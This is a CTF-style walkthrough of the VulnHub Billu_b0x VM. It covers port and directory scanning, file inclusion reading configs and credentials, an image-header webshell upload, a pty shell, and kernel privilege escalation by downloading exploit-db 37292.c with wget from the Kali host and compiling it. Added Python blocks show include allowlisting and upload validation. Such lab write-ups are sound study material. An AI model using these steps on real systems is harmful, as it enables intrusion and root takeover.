VulnHub target machine: Billu_b0x
emmm, it's been a while since I played with a VulnHub target, so let's do one today!!
Open the target VM, switch its network adapter to NAT, then start the Kali VM.
First confirm Kali's own IP address, then use nmap to discover hosts: nmap -sP 192.168.80.0/24
That reveals the target's IP address; next comes the port scan.
nmap command : nmap -p 1-65535 -sV 192.168.80.129
Two ports are open!! Ignore port 22 for now and browse straight to port 80:
The main page hints at SQL injection??? I tried the universal-password trick but could not log in...
So I gave up on that for now; if no other lead turns up I will come back to it. Information gathering first!!
Brute-force the directories with both dirbuster and dirb:
dirbuster scan results:
Dir found: /cgi-bin/ - 403
File found: /index.php - 200
Dir found: /icons/ - 403
File found: /c.php - 200
File found: /in.php - 200
File found: /show.php - 200
Dir found: /doc/ - 403
File found: /add.php - 200
File found: /test.php - 200
Dir found: /icons/small/ - 403
File found: /head.php - 200
Dir found: /uploaded_images/ - 200
File found: /uploaded_images/c.JPG - 200
File found: /uploaded_images/CaptBarbossa.JPG - 200
File found: /panel.php - 302
File found: /head2.php - 200
Dir found: /server-status/ - 403
dirb scan results:
---- Scanning URL: http://192.168.80.129/ ----
+ http://192.168.80.129/add (CODE:200|SIZE:307)
+ http://192.168.80.129/c (CODE:200|SIZE:1)
+ http://192.168.80.129/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.80.129/head (CODE:200|SIZE:2793)
==> DIRECTORY: http://192.168.80.129/images/
+ http://192.168.80.129/in (CODE:200|SIZE:47554)
+ http://192.168.80.129/index (CODE:200|SIZE:3267)
+ http://192.168.80.129/panel (CODE:302|SIZE:2469)
==> DIRECTORY: http://192.168.80.129/phpmy/
+ http://192.168.80.129/server-status (CODE:403|SIZE:295)
+ http://192.168.80.129/show (CODE:200|SIZE:1)
+ http://192.168.80.129/test (CODE:200|SIZE:72)
==> DIRECTORY: http://192.168.80.129/uploaded_images/
+ http://192.168.80.129/phpmy/ChangeLog (CODE:200|SIZE:28878)
+ http://192.168.80.129/phpmy/LICENSE (CODE:200|SIZE:18011)
+ http://192.168.80.129/phpmy/README (CODE:200|SIZE:2164)
+ http://192.168.80.129/phpmy/TODO (CODE:200|SIZE:190)
+ http://192.168.80.129/phpmy/changelog (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/contrib/
+ http://192.168.80.129/phpmy/docs (CODE:200|SIZE:2781)
+ http://192.168.80.129/phpmy/export (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/favicon (CODE:200|SIZE:18902)
+ http://192.168.80.129/phpmy/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.80.129/phpmy/import (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/index (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/js/
==> DIRECTORY: http://192.168.80.129/phpmy/libraries/
+ http://192.168.80.129/phpmy/license (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/locale/
+ http://192.168.80.129/phpmy/main (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/navigation (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/phpinfo (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/phpmyadmin (CODE:200|SIZE:42380)
==> DIRECTORY: http://192.168.80.129/phpmy/pmd/
+ http://192.168.80.129/phpmy/print (CODE:200|SIZE:1064)
+ http://192.168.80.129/phpmy/robots (CODE:200|SIZE:26)
+ http://192.168.80.129/phpmy/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.80.129/phpmy/scripts/
==> DIRECTORY: http://192.168.80.129/phpmy/setup/
+ http://192.168.80.129/phpmy/sql (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/themes/
+ http://192.168.80.129/phpmy/url (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/webapp (CODE:200|SIZE:6917)
+ http://192.168.80.129/phpmy/setup/config (CODE:303|SIZE:0)
==> DIRECTORY: http://192.168.80.129/phpmy/setup/frames/
+ http://192.168.80.129/phpmy/setup/index (CODE:200|SIZE:12970)
==> DIRECTORY: http://192.168.80.129/phpmy/setup/lib/
+ http://192.168.80.129/phpmy/setup/scripts (CODE:200|SIZE:5169)
+ http://192.168.80.129/phpmy/setup/styles (CODE:200|SIZE:6941)
+ http://192.168.80.129/phpmy/setup/validate (CODE:200|SIZE:10)
-----------------
END_TIME: Mon Nov 11 04:50:43 2019
Lots of interesting directories were found!
First visit the phpmy directory to see whether it is a phpMyAdmin page:
It is. Set it aside for now and go through the other pages one by one. First c.php: a blank page.
in.php shows phpinfo, but it looks like there is also a file inclusion vulnerability:
show.php is a blank page, nothing there; add.php looks like a file upload page:
Visiting test.php gives a hint!!!
A file parameter??? Isn't this exactly the file inclusion vulnerability I was looking for?? Passing it as a GET parameter does not work, so I guess it is POST, and that succeeds:
Good, now this file inclusion vulnerability can be used to read the contents of the other files:
c.php, show.php, in.php, index.php, add.php, head.php, panel.php
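The test.php page above includes whatever path arrives in its file parameter, which is why it can read any file on the box. As an added example (not code from the Billu_b0x VM or its author), the Python model below shows the two checks a hardened include handler needs: an allowlist of page names, and a canonical-path containment check so that traversal or absolute paths can never escape the web root. The page names in the allowlist and the request list are constructed for the demo.

```python
"""Allowlist-based include resolver: an added example, not the Billu_b0x
source. Models the fix for a page that does include($_POST['file']).
"""
import os
import tempfile

# Constructed allowlist: the only page names the application may include.
ALLOWED_PAGES = {"index.php", "show.php", "add.php", "panel.php"}


class IncludeRejected(ValueError):
    """Raised when a requested include name fails validation."""


def resolve_include(base_dir, requested):
    """Map a user-supplied page name to a path under base_dir, or raise.

    Check 1: the name must match the allowlist exactly (no directories).
    Check 2: the canonical path must still lie inside base_dir, which
    catches traversal and symlink tricks even if the allowlist is loosened.
    """
    if requested not in ALLOWED_PAGES:
        raise IncludeRejected("not an allowed page: %r" % requested)
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise IncludeRejected("resolved outside web root: %r" % target)
    return target


def classify_requests(base_dir, names):
    """Return {name: 'ok' | 'rejected'} for a batch of requested includes."""
    verdicts = {}
    for name in names:
        try:
            resolve_include(base_dir, name)
            verdicts[name] = "ok"
        except IncludeRejected:
            verdicts[name] = "rejected"
    return verdicts


def demo():
    """Run the resolver against constructed inputs in a temporary web root."""
    with tempfile.TemporaryDirectory() as root:
        for page in ALLOWED_PAGES:
            open(os.path.join(root, page), "w").close()
        requests = [
            "show.php",               # legitimate page
            "/etc/passwd",            # absolute path, as used to read system files
            "../../etc/passwd",       # traversal
            "c.php",                  # real file, but not meant to be included
            "uploaded_images/x.jpg",  # the upload-then-include trick
        ]
        return classify_requests(root, requests)


if __name__ == "__main__":
    for name, verdict in demo().items():
        print("%-26s %s" % (name, verdict))
```

Only show.php is accepted; every other request, including the upload directory that the rest of this write-up leans on, is rejected. The containment check is deliberately kept even though the allowlist already blocks these cases, so that a later "just add one more page" change cannot quietly reopen the hole.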
Since there is a phpMyAdmin page, first read its configuration file to see whether it reveals a login account and password:
That looks like an account and password, and for root, no less? Logging into phpMyAdmin with it fails; try an SSH connection instead, since it is root after all.
Unexpectedly, the login succeeds straight away...:
Is the experiment over???? Let's keep going anyway... phpMyAdmin login still has not succeeded.
Looking at show.php, it seems to be a database query page??:
Looking at c.php, I find a username and password; note them down first: billu\b0x_billu
Once I have finished going through the pages I will try this account and password on phpMyAdmin again, to save trouble:
add.php is a static page; it has no real upload function...
panel.php looks like the home page you land on after a successful login; set it aside for now:
The two head pages just display pictures. I learned a lot from reading through all of this,
the main thing being the username and password in c.php; try them as the phpMyAdmin login:
Trying to log in directly succeeds:
After some simple collection I found a username and password, biLLu\hEx_it:
Recall the login page from earlier; guessing that this is its username and password, I try to log in, and it succeeds:
I find an upload spot on the page for adding users!!
Look at the upload source code and find the vulnerability:
From the source we know that a webshell can be uploaded as a picture and then triggered through the file inclusion!!
Bypass the file-header check by prepending an image header and following it with a one-line webshell:
Executed successfully:
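The upload check above is defeated by an image header followed by PHP code, because it only inspects the first bytes. As an added example (not the Billu_b0x source or the author's code), the Python validator below reproduces that polyglot shape with a constructed, harmless PHP echo, shows that a magic-byte check alone accepts it, and shows a stricter check: extension allowlist, magic bytes, and a scan for PHP open tags anywhere in the body. The sample files and the extension list are constructed for the demo.

```python
"""Upload content validator: an added example, not the Billu_b0x source.
Shows why magic-byte checking alone passes an image/PHP polyglot.
"""
import re

JPEG_MAGIC = b"\xff\xd8\xff"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
GIF_MAGIC = (b"GIF87a", b"GIF89a")

# Anything that makes the PHP interpreter start executing if the file is included.
PHP_TAG = re.compile(rb"<\?(php|=)?|<script[^>]*language\s*=\s*['\"]?php",
                     re.IGNORECASE)

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}

# Constructed samples: a minimal JPEG-looking blob and the same blob with PHP
# appended, which is the shape of the bypass used in the write-up.
CLEAN_JPEG = JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00" + b"\x00" * 32
POLYGLOT = JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00" + b"<?php echo 'constructed marker'; ?>"
PLAIN_PHP = b"<?php echo 1; ?>"


def looks_like_image(data):
    """The weak check: only the leading bytes are inspected."""
    return (data.startswith(JPEG_MAGIC) or data.startswith(PNG_MAGIC)
            or data.startswith(GIF_MAGIC))


def validate_upload(filename, data):
    """Stricter check. Returns (accepted, reason)."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed"
    if not looks_like_image(data):
        return False, "no image magic bytes"
    if PHP_TAG.search(data):
        return False, "embedded PHP open tag"
    return True, "ok"


def demo():
    """Compare both checks on the constructed samples."""
    cases = {
        "clean.jpg": CLEAN_JPEG,
        "polyglot.jpg": POLYGLOT,
        "shell.php": PLAIN_PHP,
    }
    return {
        name: {"magic_only": looks_like_image(data),
               "strict": validate_upload(name, data)[0]}
        for name, data in cases.items()
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print("%-14s magic_only=%-5s strict=%s"
              % (name, verdict["magic_only"], verdict["strict"]))
```

The magic-only check accepts polyglot.jpg while the strict check rejects it. The tag scan is a second line of defence, not the whole fix: it can false-positive on binary image data and it does not help if another include sink exists. The robust pattern is to re-encode uploaded images with an image library, store them under a server-chosen random name outside the web root, and never pass an upload path to include().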
This makes things easy: a picture that can execute PHP code, isn't that about the same as the previous range??
Go straight in with a PHP shell script!
Get a shell:
Use python to get a proper interactive shell: python -c 'import pty; pty.spawn("/bin/bash")'
Take a look at the kernel:
emmmm, it's Ubuntu from around 2014... continue with Dirty COW for privilege escalation??
It turns out Dirty COW does not work on this VM... it just crashes?? Or did I not wait long enough?? Well, try another route.
Use cat /etc/issue to check the version number:
Search for an exploit directly:
Files cannot be created in the current directory, so switch to /tmp. Start a web service on Kali and move the file to the web root:
vim /etc/apache2/ports.conf
/etc/init.d/apache2 start
cp /usr/share/exploitdb/exploits/linux/local/37292.c /var/www/html
Download the file: wget 192.168.80.128:8888/37292.c
Compile the executable:
gcc -pthread 37292.c -o 37292 -lcrypt
./37292
Successfully got root, experiment complete!! Exactly the same result as the earlier SSH login...
There seems to be no flag, goodbye~~
Summary
Overall this experiment is similar to an earlier one: file inclusion, then a reverse shell.
The most important lesson is to know how to change approach during privilege escalation, rather than going down one road to the bitter end: when Dirty COW does not work,
think of other methods, for example going directly for Ubuntu exploits!!
Happy with this; I learned a lot from this experiment too~~ Hope to keep up the effort!!!! Come on!